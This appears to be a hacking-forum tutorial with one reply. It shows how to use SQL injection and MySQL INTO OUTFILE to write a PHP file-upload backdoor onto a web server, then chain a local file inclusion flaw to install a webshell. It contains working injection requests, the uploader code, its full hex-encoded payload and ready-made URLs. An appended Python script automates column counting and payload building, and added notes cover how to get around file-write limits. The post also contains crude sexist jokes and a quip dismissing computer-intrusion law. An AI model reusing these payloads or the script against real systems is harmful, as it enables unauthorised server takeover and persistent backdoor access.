Uploading webshell without accessing administration panel
    #1

    Hi, roommates.
    How many times have we found ourselves asking Goku for the why of everything, right? Why couldn't I find the administration panel, even after working so hard to find the login and password?
    And so we finally give up, thinking there's no solution. But now you'll see something that will save your soul from this situation.
    The administration panel isn't always everything. There are many good things in life, like nature, love, women, vagina, sex, and also the SQL language, which will help us upload our things to the server.

    So, shall we start?
    Needed materials
    • Your partner (I know you don't have a woman. I mean your hand.)


    Now, let's understand what that is.
    There is the INTO OUTFILE clause, which complements the SELECT statement and allows us to save a query result into a file. This is its syntax:
    SELECT
    <data>
    INTO OUTFILE "file";

    I'm using a test application (link hidden by the forum) in this example. Maybe afraid of the police, maybe lazy. Up to you.


    Ok, let's start the attack by getting the column count of the current query. These are my requests:
    Code:
    id=1' order by 1--+
    id=1' order by 100--+
    id=1' order by 10--+
    id=1' order by 5--+
    id=1' order by 3--+
    id=1' order by 2--+
    Cool, there are only 2 columns. We lost some time, but it's ok.
    There's a big chance we need the same number of selected columns. Therefore:
    Code:
    ?id=-1' union all select 1,2--+
    All right, we can see the numbers "1" and "2" on the page:


    Ok, we can now send files to the server. The problem now is that servers usually block URLs that are too long. So we need to send as little data as possible. But since we want a complete webshell, we can send an upload form first.
    This is our code:
    PHP Code:
    <?php if($_SERVER['REQUEST_METHOD']=="POST") { if(move_uploaded_file($_FILES['file']['tmp_name'], $_POST['name'])) { echo 'ok'; } else { echo 'error'; } } else { echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file" /><input type="text" name="name" value="'.dirname(__FILE__).'" /><input type="submit" /></form>'; }
    But we'll need to hex-encode it, so it will be easier to include it in the URL and in the SELECT. Remember to add "0x" in front of the code.
    Code:
    0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d
    We'll also need to know the webroot path (the folder where the website files are) from the root. Usually we can see this in PHP error messages, like "Warning: mysql_fetch_array()". In this case, we found an error message on another page of the same site, when trying to include a missing file. Check it out:



    Now we just need to inject that file through the URL.
    Remember to respect the selected column count (in this example, 2).
    The name I chose was "yeswecan.php", and the file will be in "/var/www/dvwa".
    Code:
    ?id=1' UNION ALL SELECT 1,uploader_hex_code INTO OUTFILE "/var/www/dvwa/yeswecan.php";--+
    Example:
    Code:
    ?id=1' UNION ALL SELECT 1,0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d INTO OUTFILE "/var/www/dvwa/yeswecan.php";--+
    Now we just need to access "yeswecan.php" and send our webshell.

    But what if...


    Hmm... shit.
    This means the MySQL server has no permission (CHMOD) to write files in this directory. That's perfectly usual, mainly on Linux servers.
    But we're not lost!
    There is a directory where all users have write privileges! Yes, the temporary dir!
    On Windows servers, it may be "C:\Temp", "C:\WINDOWS\Temp" or "C:\Users\<username>\AppData\Local\Temp". On *nix, it may be "/var/tmp" or, more often, "/tmp".

    In that case, we just change the end of our request, asking the server to save our uploader in the temporary folder.
    Code:
    ?id=1' UNION ALL SELECT 1,uploader_hex_code INTO OUTFILE "/tmp/yeswecan.php";--+
    So:
    Code:
    ?id=1' UNION ALL SELECT 1,0x3c3f70687020696628245f5345525645525b27524551554553545f4d4554484f44275d3d3d22504f53542229207b206966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f504f53545b276e616d65275d2929207b206563686f20276f6b273b207d20656c7365207b206563686f20276572726f72273b207d207d20656c7365207b206563686f20273c666f726d206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d64617461223e3c696e70757420747970653d2266696c6522206e616d653d2266696c6522202f3e3c696e70757420747970653d227465787422206e616d653d226e616d65222076616c75653d22272e6469726e616d65285f5f46494c455f5f292e2722202f3e3c696e70757420747970653d227375626d697422202f3e3c2f666f726d3e273b207d INTO OUTFILE "/tmp/yeswecan.php";--+
    Check out what we receive:

    Don't worry about the error at the top of the page. We already have the uploader on the server!
    But... now what? The /tmp dir isn't accessible through Apache. What should we do?
    It's easy, we just need to find some LFI (Local File Inclusion) vulnerability in the same system. This vulnerability, although often ignored, still saves us a lot!
    When we find one, we just have to include our "/tmp/yeswecan.php"! Check out our upload form at the top of the page:


    We just need to choose our favorite webshell (in this case I'll use WSO 2.5) and a valid place for the upload.
    If you see "Permission denied" errors, you can choose other paths to upload to. I suggest the posts' images folder, for example.


    As we can see, our uploader returned "ok". So, let's access our webshell!



    Owned.

    (0KaL)
    This material may be shared, provided proper credit is given.



    New law: breaking into protected computers is a crime.
    Logic: if I broke in, it wasn't protected. Therefore, it's not a crime :-)
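Added example, not code from the post: a small Python helper that automates the mechanical part of the procedure above. It (1) finds the column count of the injected query by probing ORDER BY n, the search the post does by hand with 1, 100, 10, 5, 3, 2; (2) hex-encodes the uploader into the bare 0x literal the post shows (the encoder reproduces that literal byte for byte, which is why the uploader is kept on one line); and (3) builds the UNION ... INTO OUTFILE payload and the URL-encoded GET query for any target path, so the webroot attempt and the /tmp fallback are the same call with a different path. The parameter name id, the 1' prefix and the paths are taken from the post; the oracle that decides whether a page rendered normally is a constructed stand-in for a two-column query, so the script runs offline, and a real run would replace it with an HTTP request whose success test depends on the target.

```python
"""Offline reconstruction of the INTO OUTFILE uploader drop from the post.

Added example; nothing here is the post's own code.  The page oracle is a
constructed stand-in, the injection prefix "1'" and the parameter "id" are
the post's.
"""
import re
from typing import Callable
from urllib.parse import quote

# The uploader exactly as posted, on one line: the 0x literal below depends
# on every byte, so reformatting it would change the payload.
UPLOADER_PHP = r'''<?php if($_SERVER['REQUEST_METHOD']=="POST") { if(move_uploaded_file($_FILES['file']['tmp_name'], $_POST['name'])) { echo 'ok'; } else { echo 'error'; } } else { echo '<form method="post" enctype="multipart/form-data"><input type="file" name="file" /><input type="text" name="name" value="'.dirname(__FILE__).'" /><input type="submit" /></form>'; }'''


def hex_literal(source: str) -> str:
    """MySQL hex string literal (0x...) for the bytes of `source`.

    A hex literal needs no quotes and contains no spaces, which is what makes
    it survive the URL and the injected SELECT untouched."""
    return "0x" + source.encode("utf-8").hex()


def order_by_probe(prefix: str, n: int) -> str:
    """The probe the post sends by hand: id=1' order by n--+"""
    return f"{prefix} order by {n}--+"


def find_column_count(page_ok: Callable[[str], bool],
                      prefix: str = "1'", limit: int = 256) -> int:
    """Largest n for which ORDER BY n does not break the page.

    page_ok(payload) must return True when the page renders normally.  The
    search doubles n until the page breaks, then bisects, which is what the
    post's manual 1, 100, 10, 5, 3, 2 sequence approximates."""
    if not page_ok(order_by_probe(prefix, 1)):
        raise ValueError("ORDER BY 1 fails: wrong injection point or prefix")
    lo, hi = 1, 2
    while page_ok(order_by_probe(prefix, hi)):  # invariant: lo works
        lo, hi = hi, hi * 2
        if hi > limit:
            raise ValueError(f"more than {limit} columns? oracle may always say OK")
    while hi - lo > 1:  # invariant: lo works, hi fails
        mid = (lo + hi) // 2
        if page_ok(order_by_probe(prefix, mid)):
            lo = mid
        else:
            hi = mid
    return lo


def outfile_payload(ncols: int, literal: str, path: str,
                    column: int = 2, prefix: str = "1'") -> str:
    """UNION ... INTO OUTFILE payload with the file body in `column` and the
    other columns padded with integers, as in the post.  The post's ';' before
    the comment is not needed and is left out."""
    if not 1 <= column <= ncols:
        raise ValueError("payload column out of range")
    cols = [str(i + 1) for i in range(ncols)]
    cols[column - 1] = literal
    return f'{prefix} UNION ALL SELECT {",".join(cols)} INTO OUTFILE "{path}"--+'


def get_query(param: str, payload: str) -> str:
    """URL-encode the payload for a GET parameter.  '+' is kept literal so the
    server decodes '--+' to '-- ', the space MySQL's '--' comment requires."""
    return f"?{param}=" + quote(payload, safe="+/")


def drop_uploader(page_ok: Callable[[str], bool], path: str) -> str:
    """The whole chain for one target path: count columns, encode, build."""
    ncols = find_column_count(page_ok)
    return get_query("id", outfile_payload(ncols, hex_literal(UPLOADER_PHP), path))


def constructed_oracle(payload: str) -> bool:
    """Constructed stand-in for the target page: the original query selects
    two columns, so ORDER BY 3 and above error out and everything else is OK."""
    m = re.search(r"order by (\d+)", payload)
    return m is None or int(m.group(1)) <= 2


if __name__ == "__main__":
    print("columns:", find_column_count(constructed_oracle))
    for target in ("/var/www/dvwa/yeswecan.php", "/tmp/yeswecan.php"):
        print(drop_uploader(constructed_oracle, target)[:90] + "...")
```

Before spending requests on paths, it is worth checking what INTO OUTFILE can do at all on the target, because the "permission denied" the post runs into is only one of its failure modes: the database account needs the FILE privilege (visible in SHOW GRANTS); the file is written by the mysqld OS user, not by the web server; an existing file is never overwritten, so a retry against the same path fails even where the first attempt would have worked; and the secure_file_priv variable (SELECT @@secure_file_priv) can confine writes to one directory or, when NULL, disable them entirely. The /tmp fallback has a caveat of its own on systemd hosts whose database unit sets PrivateTmp=true: the /tmp that mysqld writes into is a private mount that the web server's LFI never sees.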
    #2
    Where did you post it

    Where else did you post this tutorial, apart from here? Because it's in English, and then because you posted it in Portuguese (nothing against it).
